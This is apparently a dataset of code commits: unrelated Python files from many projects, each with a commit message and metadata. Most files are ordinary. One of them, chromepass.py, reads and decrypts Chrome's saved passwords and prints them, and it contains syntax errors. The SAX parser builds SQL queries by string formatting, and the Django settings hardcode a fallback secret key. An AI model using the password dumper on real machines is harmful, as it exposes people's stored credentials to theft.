digits = fetch_mldata("USPS")
X, y = digits.data, digits.target.astype(np.int)
accs_pystruct, times_pystruct = eval_on_data(X, y - 1, svm, Cs=Cs)
accs_svmstruct, times_svmstruct = eval_on_data(X, y, multisvm, Cs=Cs)
plot_timings(np.array(times_svmstruct) - 35, times_pystruct,
dataset="usps")
plt.show()
| Python | 0 | |
cc19cdc3430df018e3a8fa63abaf796a897a475b | Add naive bayes SQL test. | Orange/tests/sql/test_naive_bayes.py | Orange/tests/sql/test_naive_bayes.py | import unittest
from numpy import array
import Orange.classification.naive_bayes as nb
from Orange.data.discretization import DiscretizeTable
from Orange.data.sql.table import SqlTable
from Orange.data.variable import DiscreteVariable
class NaiveBayesTest(unittest.TestCase):
def test_NaiveBayes(self):
table = SqlTable(host='localhost', database='test', table='iris',
type_hints=dict(iris=DiscreteVariable(
values=['Iris-setosa', 'Iris-versicolor',
'Iris-virginica']),
__class_vars__=['iris']))
table = DiscretizeTable(table)
bayes = nb.BayesLearner()
clf = bayes(table)
# Single instance prediction
self.assertEqual(clf(table[0]), table[0].get_class())
# Table prediction
pred = clf(table)
actual = array([ins.get_class() for ins in table])
ca = pred == actual
ca = ca.sum() / len(ca)
self.assertGreater(ca, 0.95)
self.assertLess(ca, 1.)
| Python | 0.000001 | |
0ed71f8c580e8eb80c55b817c3f971b946016f02 | update docstring for Postman.connection | mailthon/postman.py | mailthon/postman.py | """
mailthon.postman
~~~~~~~~~~~~~~~~
This module implements the central Postman object.
:copyright: (c) 2015 by Eeo Jun
:license: MIT, see LICENSE for details.
"""
from contextlib import contextmanager
from smtplib import SMTP
from .response import SendmailResponse
from .helpers import encode_address
class Postman(object):
"""
Encapsulates a connection to a server and knows
how to send MIME emails over a certain transport.
When subclassing, change the ``transport`` and
``response_cls`` class variables to tweak the
transport used and the response class, respectively.
:param host: The address to a server.
:param port: Port to connect to.
:param middlewares: An iterable of middleware that
will be used by the Postman.
:param options: Dictionary of options to be passed
to the underlying transport.
"""
transport = SMTP
response_cls = SendmailResponse
def __init__(self, host, port, middlewares=(), options=None):
self.host = host
self.port = port
self.middlewares = list(middlewares)
self.options = options or {}
def use(self, middleware):
"""
Use a certain callable *middleware*, i.e.
append it to the list of middlewares, and
return it so it can be used as a decorator.
"""
self.middlewares.append(middleware)
return middleware
@contextmanager
def connection(self):
"""
A context manager that returns a connection
to the server using some transport, defaulting
to SMTP. The transport will be called with
the server address, port, and options that have
been passed to the constructor, in that order.
"""
conn = self.transport(self.host, self.port, **self.options)
try:
conn.ehlo()
for item in self.middlewares:
item(conn)
yield conn
finally:
conn.quit()
def deliver(self, conn, envelope):
"""
Deliver an *envelope* using a given connection
*conn*, and return the response object. Does
not close the connection.
"""
rejected = conn.sendmail(
encode_address(envelope.mail_from),
[encode_address(k) for k in envelope.receivers],
envelope.string(),
)
return self.response_cls(conn.noop(), rejected)
def send(self, envelope):
"""
Sends an *envelope* and return a response
object.
"""
with self.connection() as conn:
return self.deliver(conn, envelope)
| """
mailthon.postman
~~~~~~~~~~~~~~~~
This module implements the central Postman object.
:copyright: (c) 2015 by Eeo Jun
:license: MIT, see LICENSE for details.
"""
from contextlib import contextmanager
from smtplib import SMTP
from .response import SendmailResponse
from .helpers import encode_address
class Postman(object):
"""
Encapsulates a connection to a server and knows
how to send MIME emails over a certain transport.
When subclassing, change the ``transport`` and
``response_cls`` class variables to tweak the
transport used and the response class, respectively.
:param host: The address to a server.
:param port: Port to connect to.
:param middlewares: An iterable of middleware that
will be used by the Postman.
:param options: Dictionary of options to be passed
to the underlying transport.
"""
transport = SMTP
response_cls = SendmailResponse
def __init__(self, host, port, middlewares=(), options=None):
self.host = host
self.port = port
self.middlewares = list(middlewares)
self.options = options or {}
def use(self, middleware):
"""
Use a certain callable *middleware*, i.e.
append it to the list of middlewares, and
return it so it can be used as a decorator.
"""
self.middlewares.append(middleware)
return middleware
@contextmanager
def connection(self):
"""
A context manager that returns a connection
to the server using some transport, defaulting
to SMTP. The transport will be called with
the server address and port that has been
passed to the constructor, in that order.
"""
conn = self.transport(self.host, self.port, **self.options)
try:
conn.ehlo()
for item in self.middlewares:
item(conn)
yield conn
finally:
conn.quit()
def deliver(self, conn, envelope):
"""
Deliver an *envelope* using a given connection
*conn*, and return the response object. Does
not close the connection.
"""
rejected = conn.sendmail(
encode_address(envelope.mail_from),
[encode_address(k) for k in envelope.receivers],
envelope.string(),
)
return self.response_cls(conn.noop(), rejected)
def send(self, envelope):
"""
Sends an *envelope* and return a response
object.
"""
with self.connection() as conn:
return self.deliver(conn, envelope)
| Python | 0 |
78f89e96adedd1045f900d5f9f95c3eb35c12ca3 | Create routine module with Tool class | performance/routine.py | performance/routine.py |
class Tool:
def __init__(self, config):
pass
| Python | 0 | |
8a841da19dee2aed6838737aad5485d25b4c8e74 | add DetectPlates.py | DetectPlates.py | DetectPlates.py | # DetectPlates.py
import cv2
import numpy as np
import math
import Main
import random
import Preprocess
import DetectChars
import PossiblePlate
import PossibleChar
# module level variables ##########################################################################
PLATE_WIDTH_PADDING_FACTOR = 1.1
PLATE_HEIGHT_PADDING_FACTOR = 1.5
#1.3 dan 1.5
####################################################################################################
def detectPlatesInScene(imgOriginalScene):
listOfPossiblePlates = [] # this will be the return value
height, width, numChannels = imgOriginalScene.shape
imgGrayscaleScene = np.zeros((height, width, 1), np.uint8)
imgThreshScene = np.zeros((height, width, 1), np.uint8)
imgContours = np.zeros((height, width, 3), np.uint8)
imgGrayscaleScene, imgThreshScene = Preprocess.preprocess(imgOriginalScene) # preprocess to get grayscale and threshold images
# find all possible chars in the scene,
# this function first finds all contours, then only includes contours that could be chars (without comparison to other chars yet)
listOfPossibleCharsInScene = findPossibleCharsInScene(imgThreshScene)
# given a list of all possible chars, find groups of matching chars
# in the next steps each group of matching chars will attempt to be recognized as a plate
listOfListsOfMatchingCharsInScene = DetectChars.findListOfListsOfMatchingChars(listOfPossibleCharsInScene)
for listOfMatchingChars in listOfListsOfMatchingCharsInScene: # for each group of matching chars
possiblePlate = extractPlate(imgOriginalScene, listOfMatchingChars) # attempt to extract plate
if possiblePlate.imgPlate is not None: # if plate was found
listOfPossiblePlates.append(possiblePlate) # add to list of possible plates
# end if
# end for
#print("\n" + str(len(listOfPossiblePlates)) + " possible plates found") # 13 with MCLRNF1 image
return listOfPossiblePlates
# end function
###################################################################################################
def findPossibleCharsInScene(imgThresh):
listOfPossibleChars = [] # this will be the return value
intCountOfPossibleChars = 0
imgThreshCopy = imgThresh.copy()
imgContours, contours, npaHierarchy = cv2.findContours(imgThreshCopy, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE) # find all contours
height, width = imgThresh.shape
imgContours = np.zeros((height, width, 3), np.uint8)
for i in range(0, len(contours)): # for each contour
possibleChar = PossibleChar.PossibleChar(contours[i])
if DetectChars.checkIfPossibleChar(possibleChar): # if contour is a possible char, note this does not compare to other chars (yet) . . .
intCountOfPossibleChars = intCountOfPossibleChars + 1 # increment count of possible chars
listOfPossibleChars.append(possibleChar) # and add to list of possible chars
# end if
# end for
return listOfPossibleChars
# end function
###################################################################################################
def extractPlate(imgOriginal, listOfMatchingChars):
possiblePlate = PossiblePlate.PossiblePlate() # this will be the return value
listOfMatchingChars.sort(key = lambda matchingChar: matchingChar.intCenterX) # sort chars from left to right based on x position
# calculate the center point of the plate
fltPlateCenterX = (listOfMatchingChars[0].intCenterX + listOfMatchingChars[len(listOfMatchingChars) - 1].intCenterX) / 2.0
fltPlateCenterY = (listOfMatchingChars[0].intCenterY + listOfMatchingChars[len(listOfMatchingChars) - 1].intCenterY) / 2.0
ptPlateCenter = fltPlateCenterX, fltPlateCenterY
# calculate plate width and height
intPlateWidth = int((listOfMatchingChars[len(listOfMatchingChars) - 1].intBoundingRectX + listOfMatchingChars[len(listOfMatchingChars) - 1].intBoundingRectWidth - listOfMatchingChars[0].intBoundingRectX) * PLATE_WIDTH_PADDING_FACTOR)
intTotalOfCharHeights = 0
for matchingChar in listOfMatchingChars:
intTotalOfCharHeights = intTotalOfCharHeights + matchingChar.intBoundingRectHeight
# end for
fltAverageCharHeight = intTotalOfCharHeights / len(listOfMatchingChars)
intPlateHeight = int(fltAverageCharHeight * PLATE_HEIGHT_PADDING_FACTOR)
# calculate correction angle of plate region
fltOpposite = listOfMatchingChars[len(listOfMatchingChars) - 1].intCenterY - listOfMatchingChars[0].intCenterY
fltHypotenuse = DetectChars.distanceBetweenChars(listOfMatchingChars[0], listOfMatchingChars[len(listOfMatchingChars) - 1])
fltCorrectionAngleInRad = math.asin(fltOpposite / fltHypotenuse)
fltCorrectionAngleInDeg = fltCorrectionAngleInRad * (180.0 / math.pi)
# pack plate region center point, width and height, and correction angle into rotated rect member variable of plate
possiblePlate.rrLocationOfPlateInScene = ( tuple(ptPlateCenter), (intPlateWidth, intPlateHeight), fltCorrectionAngleInDeg )
# final steps are to perform the actual rotation
# get the rotation matrix for our calculated correction angle
rotationMatrix = cv2.getRotationMatrix2D(tuple(ptPlateCenter), fltCorrectionAngleInDeg, 1.0)
height, width, numChannels = imgOriginal.shape # unpack original image width and height
imgRotated = cv2.warpAffine(imgOriginal, rotationMatrix, (width, height)) # rotate the entire image
imgCropped = cv2.getRectSubPix(imgRotated, (intPlateWidth, intPlateHeight), tuple(ptPlateCenter))
possiblePlate.imgPlate = imgCropped # copy the cropped plate image into the applicable member variable of the possible plate
return possiblePlate
# end function
| Python | 0 | |
6c0aab6c14539b1cd4eedcd1280bcc4eb35ff7ea | Create poly_talker.py | poly_talker.py | poly_talker.py | #! /usr/bin/env python
import rospy
from std_msgs.msg import String
from random import randint
def talker():
# List of names to be printed
words = ["Dr. Bushey", "Vamsi", "Jon"]
# Registers with roscore a node called "talker".
# ROS programs are called nodes.
rospy.init_node('talker')
# Publisher object gets registered to roscore and creates a topic.
pub = rospy.Publisher('names', String)
# How fast names will be posted. In Hertz.
rate = rospy.Rate(21)
while not rospy.is_shutdown():
number = randint(0,2)
pub.publish(words[number])
rate.sleep()
if __name__ == '__main__':
try:
talker()
except rospy.ROSInterruptException:
pass
| Python | 0.000001 | |
7b3753428f04c86b95191e76ca2c50b54577411a | add problem 27 | problem_027.py | problem_027.py | #!/usr/bin/env python
#-*-coding:utf-8-*-
'''
Euler discovered the remarkable quadratic formula:
n² + n + 41
It turns out that the formula will produce 40 primes for
the consecutive values n = 0 to 39.
However, when n = 40, 402 + 40 + 41 = 40(40 + 1) + 41 is
divisible by 41, and certainly when n = 41, 41² + 41 + 41 is
clearly divisible by 41.
The incredible formula n² − 79n + 1601 was discovered,
which produces 80 primes for the consecutive values n = 0 to 79.
The product of the coefficients, −79 and 1601, is −126479.
Considering quadratics of the form:
n² + an + b, where |a| < 1000 and |b| < 1000
where |n| is the modulus/absolute value of n
e.g. |11| = 11 and |−4| = 4
Find the product of the coefficients, a and b,
for the quadratic expression that produces the maximum number of
primes for consecutive values of n, starting with n = 0.
'''
import math
import timeit
def loop(i):
(ma, mb, mn) = (0, 0, 0)
primes = [j for j in range(-i+1, i) if is_prime(abs(j))]
for a in primes:
for b in primes:
n = 0
while is_prime(n**2+a*n+b):
n += 1
(ma, mb, mn) = (a, b, n) if mn < n else (ma, mb, mn)
return ma, mb, mn, ma*mb
def is_prime(n):
if n < 2:
return False
for i in range(2, int(math.sqrt(n))+1):
if n % i == 0:
return False
return True
if __name__ == '__main__':
print loop(1000)
print timeit.Timer('problem_027.loop(1000)', 'import problem_027').timeit(1) | Python | 0.019702 | |
f530fb3ebe5639d7d6dfe013c5abc70769009a04 | add script | collapse.py | collapse.py | #!/usr/bin/env python
import json
import sys
import argparse
import xmldict
f='bla.json'
ref=2
out=[]
with open(f) as data_file:
pages = json.load(data_file)
for page in pages:
data = page['data']
lineIter = iter(data)
oldline = None
for line in lineIter:
ref_line = line[ref]['text']
if not ref_line:
#print "bla"
if oldline:
for cellold,cellnew in zip(oldline,line):
cellold['text'] = ' '.join( [cellold['text'] , cellnew['text']]).rstrip()
else:
if oldline:
out.append( oldline )
oldline = line
#print out
print json.dumps(out, sort_keys=True, indent=4)
#for line in data:
# print line[ref]['text']
# #for cell in line:
# # print cell['text']
# #print line['text']
| Python | 0.000001 | |
e9451a8b2d196353e393d265482e37faa651eb1e | Tue Nov 4 20:46:16 PKT 2014 Init | chromepass.py | chromepass.py | from os import getenv
import sqlite3
import win32crypt
appdata = getenv("APPDATA")
connection = sqlite3.connect(appdata + "\..\Local\Google\Chrome\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
#chrome encrypts the password with Windows WinCrypt.
#Fortunately Decrypting it is no big issue.
pass = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if pass:
print 'website_link ' + information[0]
print 'Username: ' + information[1]
print 'Password: ' + password
| Python | 0 | |
0c38c72ef0bc337677f80f0b087ffa374f211e37 | Create saxparser.py | saxparser.py | saxparser.py | #!/usr/bin/python
import sys
import xml.sax
import io
import MySQLdb
class MyHandler(xml.sax.ContentHandler):
def __init__(self):
xml.sax.ContentHandler.__init__(self)
self.db = MySQLdb.connect(host="localhost", user="root", passwd="", db="registerdb2011")
self.cursor = self.db.cursor()
self.buffer = []
self.ctrlId = 0
self.purposeId = 0
def getCharacters(self):
data = ''.join(self.buffer).strip()
self.buffer = []
return data.strip()
def characters(self, name):
self.buffer.append(name)
def endElement(self, name):
data = self.getCharacters()
if name == "DATA_CTLR_NAME":
self.ctrlId = self.ctrlId +1
self.insertDatactrl(data)
elif name == "OTHER_NAME":
self.insertOthername(data)
elif name == "PURPOSE" and data != "":
self.purposeId = self.purposeId +1
self.insertPurpose(data)
elif name == "PURPOSE_TEXT":
self.insertPurposeOthername(data)
elif name == "CLASS":
self.insertPurposeClass(data)
elif name == "RECIPIENT":
self.insertPurposeRecipient(data)
elif name == "TRANSFER":
self.insertPurposeTransfer(data)
elif name == "SUBJECT":
self.insertPurposeSubject(data)
def insertDatactrl(self, data):
self.cursor.execute('insert into datactrl(datactrl_id, datactrl_name) values("%s", "%s")' % (self.ctrlId, data))
self.db.commit()
sys.stdout.write("inserted datactrl %s %s\n" % (self.ctrlId, data))
def insertOthername(self, data):
self.cursor.execute('insert into datactrl_othernames(datactrl_id, othername) values("%s", "%s")' % (self.ctrlId, data))
def insertPurpose(self, data):
self.cursor.execute('insert into purpose(purpose_id, datactrl_id, purpose_name) values("%s", "%s", "%s")' % (self.purposeId, self.ctrlId, data))
def insertPurposeClass(self, data):
self.cursor.execute('insert into purpose_classes(purpose_id, datactrl_id, class) values("%s", "%s", "%s")' % (self.purposeId, self.ctrlId, data))
def insertPurposeOthername(self, data):
self.cursor.execute('insert into purpose_othernames(purpose_id, datactrl_id, othername) values("%s", "%s", "%s")' % (self.purposeId, self.ctrlId, data))
def insertPurposeRecipient(self, data):
self.cursor.execute('insert into purpose_recipients(purpose_id, datactrl_id, recipient) values("%s", "%s", "%s")' % (self.purposeId, self.ctrlId, data))
def insertPurposeSubject(self, data):
self.cursor.execute('insert into purpose_subjects(purpose_id, datactrl_id, subject) values("%s", "%s", "%s")' % (self.purposeId, self.ctrlId, data))
def insertPurposeTransfer(self, data):
self.cursor.execute('insert into purpose_transfers(purpose_id, datactrl_id, transfer) values("%s", "%s", "%s")' % (self.purposeId, self.ctrlId, data))
handler = MyHandler()
stream = io.open("register_31072011.xml", "r")
xml.sax.parse(stream, handler)
| Python | 0.000002 | |
cf9b6b477e6d044e4065086f98906a0eb4504ff3 | Add slack_nagios script | slack_nagios.py | slack_nagios.py | #!/bin/python
import argparse
import requests
"""
A simple script to post nagios notifications to slack
Similar to https://raw.github.com/tinyspeck/services-examples/master/nagios.pl
But adds proxy support
Note: If your internal proxy only exposes an http interface, you will need to be running a modern version of urllib3.
See https://github.com/kennethreitz/requests/issues/1359
Designed to work as such:
slack_nagios.py -field slack_channel=#alerts -field HOSTALIAS="$HOSTNAME$" -field SERVICEDESC="$SERVICEDESC$" -field SERVICESTATE="$SERVICESTATE$" -field SERVICEOUTPUT="$SERVICEOUTPUT$" -field NOTIFICATIONTYPE="$NOTIFICATIONTYPE$"
slack_nagios.py -field slack_channel=#alerts -field HOSTALIAS="$HOSTNAME$" -field HOSTSTATE="$HOSTSTATE$" -field HOSTOUTPUT="$HOSTOUTPUT$" -field NOTIFICATIONTYPE="$NOTIFICATIONTYPE$"
"""
def send_alert(args):
if args.proxy:
proxy = {
"http": args.proxy,
"https": args.proxy
}
else:
proxy = {}
url = "https://{d}/services/hooks/nagios?token={t}".format(
d=args.domain,
t=args.token
)
payload = {
'slack_channel': "#" + args.channel
}
for field in args.field:
key, value = field[0].split('=')
payload[key] = value
req = requests.post(url=url, proxies=proxy, data=payload)
if args.debug:
print(req.text)
print(req.status_code)
return req
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Post nagios notifications to slack")
parser.add_argument('--debug', help="Debug mode", action='store_true')
parser.add_argument('--proxy', '-p', help="Proxy to use, full url format", default=None)
parser.add_argument('--domain', '-d', help="Slack domain to post to", required=True)
parser.add_argument('--channel', '-c', help="Channel to post to", required=True)
parser.add_argument('--token', '-t', help="Auth token", required=True)
parser.add_argument('-field', nargs='*', required=True, action='append',
help="Alert fields (Should be specified more than once)")
args = parser.parse_args()
send_alert(args)
| Python | 0 | |
f437b7875aa4bed06dcf3884bb81c009b7e473f0 | Add 290-word-pattern.py | 290-word-pattern.py | 290-word-pattern.py | """
Question:
Word Pattern
Given a pattern and a string str, find if str follows the same pattern.
Examples:
pattern = "abba", str = "dog cat cat dog" should return true.
pattern = "abba", str = "dog cat cat fish" should return false.
pattern = "aaaa", str = "dog cat cat dog" should return false.
pattern = "abba", str = "dog dog dog dog" should return false.
Notes:
Both pattern and str contains only lowercase alphabetical letters.
Both pattern and str do not have leading or trailing spaces.
Each word in str is separated by a single space.
Each letter in pattern must map to a word with length that is at least 1.
Credits:
Special thanks to @minglotus6 for adding this problem and creating all test cases.
Performance:
1. Total Accepted: 1839 Total Submissions: 6536 Difficulty: Easy
2. Sorry. We do not have enough accepted submissions.
"""
class Solution(object):
def wordPattern(self, pattern, str):
"""
:type pattern: str
:type str: str
:rtype: bool
"""
patterns = list(pattern)
words = str.split(" ")
if len(patterns) != len(words):
return False
short_to_long = dict()
seen_longs = set([])
for idx, short in enumerate(patterns):
long = words[idx]
if short not in short_to_long:
if long in seen_longs:
return False
short_to_long[short] = long
seen_longs.add(long)
else:
if short_to_long[short] != long:
return False
return True
assert Solution().wordPattern("abba", "dog cat cat dog") is True
assert Solution().wordPattern("abba", "dog cat cat fish") is False
assert Solution().wordPattern("aaaa", "dog cat cat dog") is False
assert Solution().wordPattern("abba", "dog dog dog dog") is False
| Python | 0.999973 | |
f39a640a8d5bf7d4a5d80f94235d1fa7461bd4dc | Add code for stashing a single nuxeo image on s3. | s3stash/stash_single_image.py | s3stash/stash_single_image.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os
import argparse
import logging
import json
from s3stash.nxstashref_image import NuxeoStashImage
def main(argv=None):
parser = argparse.ArgumentParser(description='Produce jp2 version of Nuxeo image file and stash in S3.')
parser.add_argument('path', help="Nuxeo document path")
parser.add_argument('--bucket', default='ucldc-private-files/jp2000', help="S3 bucket name")
parser.add_argument('--region', default='us-west-2', help='AWS region')
parser.add_argument('--pynuxrc', default='~/.pynuxrc', help="rc file for use by pynux")
parser.add_argument('--replace', action="store_true", help="replace file on s3 if it already exists")
if argv is None:
argv = parser.parse_args()
# logging
# FIXME would like to name log with nuxeo UID
filename = argv.path.split('/')[-1]
logfile = "logs/{}.log".format(filename)
print "LOG:\t{}".format(logfile)
logging.basicConfig(filename=logfile, level=logging.INFO, format='%(asctime)s (%(name)s) [%(levelname)s]: %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
logger = logging.getLogger(__name__)
# convert and stash jp2
nxstash = NuxeoStashImage(argv.path, argv.bucket, argv.region, argv.pynuxrc, argv.replace)
report = nxstash.nxstashref()
# output report to json file
reportfile = "reports/{}.json".format(filename)
with open(reportfile, 'w') as f:
json.dump(report, f, sort_keys=True, indent=4)
# parse report to give basic stats
print "REPORT:\t{}".format(reportfile)
print "SUMMARY:"
if 'already_s3_stashed' in report.keys():
print "already stashed:\t{}".format(report['already_s3_stashed'])
print "converted:\t{}".format(report['converted'])
print "stashed:\t{}".format(report['stashed'])
print "\nDone."
if __name__ == "__main__":
sys.exit(main())
| Python | 0 | |
12821e2859151e8f949f55b8c363ff95d296a7d0 | add setup.py for python interface | python/setup.py | python/setup.py | #!/usr/bin/env python
from distutils.core import setup, Extension
setup(name = "LIBSVM",
version = "2.87",
author="Chih-Chung Chang and Chih-Jen Lin",
maintainer="Chih-Jen Lin",
maintainer_email="cjlin@csie.ntu.edu.tw",
url="http://www.csie.ntu.edu.tw/~cjlin/libsvm/",
description = "LIBSVM Python Interface",
ext_modules = [Extension("svmc",
["../svm.cpp", "svmc_wrap.c"],
extra_compile_args=["-O3", "-I../"]
)
],
py_modules=["svm"],
)
| Python | 0.000001 | |
794b8c32dd0c5bd45bb580a75f6f4da63b689eb6 | Add `find_contentitem_urls` management command to index URL usage | fluent_contents/management/commands/find_contentitem_urls.py | fluent_contents/management/commands/find_contentitem_urls.py | import operator
from functools import reduce
import sys
from django.core.management.base import BaseCommand
from django.db import models
from django.db.models import Q
from django.utils.encoding import force_text
from django.utils import six
from fluent_contents.extensions import PluginHtmlField, PluginImageField, PluginUrlField
from fluent_contents.extensions import plugin_pool
from html5lib import treebuilders, HTMLParser
class Command(BaseCommand):
"""
Add a prefix to the name of content items.
This makes content items easier to spot in the permissions list.
"""
help = "Find all link and image URLs in all content items."
def handle(self, *args, **options):
self.verbosity = options['verbosity']
urls = []
# Look through all registered models.
for model in plugin_pool.get_model_classes():
urls += self.inspect_model(model)
self.stdout.write("")
for urls in sorted(set(urls)):
self.stdout.write(urls)
def inspect_model(self, model):
"""
Inspect a single model
"""
# See which interesting fields the model holds.
url_fields = sorted(f for f in model._meta.fields if isinstance(f, (PluginUrlField, models.URLField)))
picture_fields = sorted(f for f in model._meta.fields if isinstance(f, (PluginImageField, models.ImageField)))
html_fields = sorted(f for f in model._meta.fields if isinstance(f, PluginHtmlField))
if not picture_fields and not html_fields and not url_fields:
return []
all_fields = [f.name for f in (picture_fields + html_fields + url_fields)]
sys.stderr.write("Inspecting {0} ({1})\n".format(model.__name__, ", ".join(all_fields)))
q_notnull = reduce(operator.or_, (Q(**{"{0}__isnull".format(f): False}) for f in all_fields))
qs = model.objects.filter(q_notnull).order_by('pk')
urls = []
for contentitem in qs:
# HTML fields need proper html5lib parsing
for field in html_fields:
value = getattr(contentitem, field.name)
if value:
html_images = self.extract_html_urls(value)
for image in html_images:
self.show_match(contentitem, image)
urls += html_images
# Picture fields take the URL from the storage class.
for field in picture_fields:
value = getattr(contentitem, field.name)
if value:
self.show_match(contentitem, value)
urls.append(force_text(value.url))
# URL fields can be read directly.
for field in url_fields:
value = getattr(contentitem, field.name)
if isinstance(value, six.text_type):
urls.append(value)
else:
urls.append(value.to_db_value()) # AnyUrlValue
return urls
def show_match(self, contentitem, value):
if self.verbosity >= 2:
self.stdout.write("{0}#{1}: \t{2}".format(contentitem.__class__.__name__, contentitem.pk, value))
def extract_html_urls(self, html):
"""
Take all ``<img src="..">`` from the HTML
"""
p = HTMLParser(tree=treebuilders.getTreeBuilder("dom"))
dom = p.parse(html)
urls = []
for img in dom.getElementsByTagName('img'):
src = img.getAttribute('src')
if src:
urls.append(src)
srcset = img.getAttribute('srcset')
if srcset:
urls += self.extract_srcset(srcset)
for source in dom.getElementsByTagName('source'):
srcset = source.getAttribute('srcset')
if srcset:
urls += self.extract_srcset(srcset)
for source in dom.getElementsByTagName('a'):
href = source.getAttribute('href')
if href:
urls.append(href)
return urls
def extract_srcset(self, srcset):
"""
Handle ``srcset="image.png 1x, image@2x.jpg 2x"``
"""
urls = []
for item in srcset.split(','):
if item:
urls.append(item.rsplit(' ', 1)[0])
return urls
| Python | 0 | |
836459d4858c4892bdada9b970d73eadb43ad51b | Add settings | problemotd/settings.py | problemotd/settings.py | '''
Django settings for problemotd project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
'''
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
ENVIRONMENT = os.environ
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ENVIRONMENT.get('SECRET_KEY', '_a+u72oii#)9p%&l4!@z66_815e1c7(7j892&k_oxjqoxxpq=9');
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = bool(ENVIRONMENT.get('DEBUG', True))
TEMPLATE_DEBUG = DEBUG
ALLOWED_HOSTS = []
ADMINS = (
('Max', ENVIRONMENT.get('EMAIL_USER')),
)
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
'core',
'djrill',
'compressor',
'social_auth',
#'debug_toolbar',
)
MIDDLEWARE_CLASSES = (
'django.middleware.cache.UpdateCacheMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'social_auth.middleware.SocialAuthExceptionMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
#'debug_toolbar.middleware.DebugToolbarMiddleware',
'django.middleware.cache.FetchFromCacheMiddleware',
)
ROOT_URLCONF = 'problemotd.urls'
WSGI_APPLICATION = 'problemotd.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
if DEBUG:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'problemotd',
'USER': 'vagrant',
'PASSWORD': '',
'HOST': 'localhost',
'PORT': '5432',
}
}
else:
import dj_database_url
DATABASES = {'default': dj_database_url.config()}
ALLOWED_HOSTS = ['problemotd.herokuapp.com', '.problemotd.com']
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/New_York'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
#COMPRESS_OFFLINE = True
COMPRESS_ENABLED = False
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'social_auth.context_processors.social_auth_by_name_backends',
'social_auth.context_processors.social_auth_login_redirect',
)
#Recaptcha
RECAPTCHA_PUBLIC_KEY = ENVIRONMENT.get('RECAPTCHA_PUBLIC_KEY', '')
RECAPTCHA_PRIVATE_KEY = ENVIRONMENT.get('RECAPTCHA_PRIVATE_KEY', '')
RECAPTCHA_ENABLED = True if RECAPTCHA_PUBLIC_KEY else False
#Honeypot BlackList
HTTPBL_KEY = ENVIRONMENT.get('HTTPBL_KEY')
HTTPBL_ADDRESS = 'dnsbl.httpbl.org'
HTTPBL_TL = 45 # Threat Level
MANDRILL_API_KEY = ENVIRONMENT.get('MANDRILL_API_KEY', '')
EMAIL_BACKEND = 'djrill.mail.backends.djrill.DjrillBackend'
SERVER_EMAIL = 'no-reply@problemotd.com'
if ENVIRONMENT.get('MEMCACHIER_SERVERS'):
ENVIRONMENT['MEMCACHE_SERVERS'] = ENVIRONMENT.get('MEMCACHIER_SERVERS', '').replace(',', ';')
ENVIRONMENT['MEMCACHE_USERNAME'] = ENVIRONMENT.get('MEMCACHIER_USERNAME', '')
ENVIRONMENT['MEMCACHE_PASSWORD'] = ENVIRONMENT.get('MEMCACHIER_PASSWORD', '')
CACHES = {
'default': {
'BACKEND': 'django_pylibmc.memcached.PyLibMCCache',
'LOCATION': ENVIRONMENT.get('MEMCACHIER_SERVERS', '').replace(',', ';'),
'TIMEOUT': 60,
'BINARY': True,
'OPTIONS': {
'tcp_nodelay': True
}
}
}
else:
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
}
#Authentication
AUTHENTICATION_BACKENDS = (
'social_auth.backends.contrib.github.GithubBackend',
#'social_auth.backends.contrib.bitbucket.BitbucketBackend',
'django.contrib.auth.backends.ModelBackend',
)
GITHUB_APP_ID = ENVIRONMENT.get('GITHUB_APP_ID', '')
GITHUB_API_SECRET = ENVIRONMENT.get('GITHUB_API_SECRET', '')
GITHUB_EXTENDED_PERMISSIONS = ['user:email']
#BITBUCKET_CONSUMER_KEY = ENVIRONMENT.get('BITBUCKET_CONSUMER_KEY', '')
#BITBUCKET_CONSUMER_SECRET = ENVIRONMENT.get('BITBUCKET_CONSUMER_SECRET', '')
LOGIN_URL = '/login/'
LOGIN_REDIRECT_URL = '/'
LOGIN_ERROR_URL = '/login/'
SOCIAL_AUTH_DEFAULT_USERNAME = 'Problem Master'
SOCIAL_AUTH_UUID_LENGTH = 8
SOCIAL_AUTH_FORCE_POST_DISCONNECT = True
